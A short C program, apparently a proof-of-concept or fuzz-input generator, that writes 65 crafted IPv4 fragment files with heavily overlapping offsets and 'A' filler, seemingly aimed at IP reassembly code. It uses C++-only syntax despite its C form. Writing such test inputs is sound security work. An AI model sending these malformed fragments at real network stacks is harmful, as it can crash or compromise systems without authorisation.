#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>

unsigned char header[] = { 0x45, 0x00, 0x01, 0x14, 0x13, 0x37, 0x20, 0x00, 0x80, 0x06, 0x00, 0x00, 0x7F, 0x00, 0x00, 0x01, 0x7f, 0x00, 0x00, 0x01 };

uint16_t switch_endian(uint16_t in) {
    return (((in & 0xFF) << 8) | (in >> 8));
}

void generate_packet(char *filename, uint16_t content_len, uint16_t frag_off, bool last = false) {
    uint16_t total_len = (uint16_t)(sizeof(header) + content_len);

    *(uint16_t *)(header + 2) = switch_endian(total_len);

    uint16_t fragment_flags = 0x2000;
    if(last) fragment_flags = 0;
    frag_off += fragment_flags;

    *(uint16_t *)(header + 6) = switch_endian(frag_off);

    uint16_t *header_words = (uint16_t *)header;
    uint32_t sum = 0;
    *(uint16_t *)(header + 10) = 0;
    for(int i=0; i<(sizeof(header)/2); i++) {
        sum += switch_endian(header_words[i]);
        while(sum & 0xFFFF0000) {
            sum = ((sum & 0xFFFF0000) >> 16) + (sum & 0xFFFF);
        }
    }
    *(uint16_t *)(header + 10) = switch_endian(~(uint16_t)sum);

    unsigned char *content = (unsigned char *)malloc(content_len);
    for(size_t i=0; i<content_len; i++) { content[i] = 0x41; }
    FILE *fp = fopen(filename, "wb");
    if(!fp) {
        printf("Error writing file\n");
        return;
    }
    fwrite(header, sizeof(header), 1, fp);
    fwrite(content, content_len, 1, fp);
    fclose(fp);
    return;
}

int main(int argc, char **argv) {
    char filename[1024];
    for(int i=0; i< 64; i++) {
      sprintf(filename, "a%d", i);
      generate_packet(filename, 1024, i, false);
    }
    generate_packet("a64", 1024, 64, true);
}
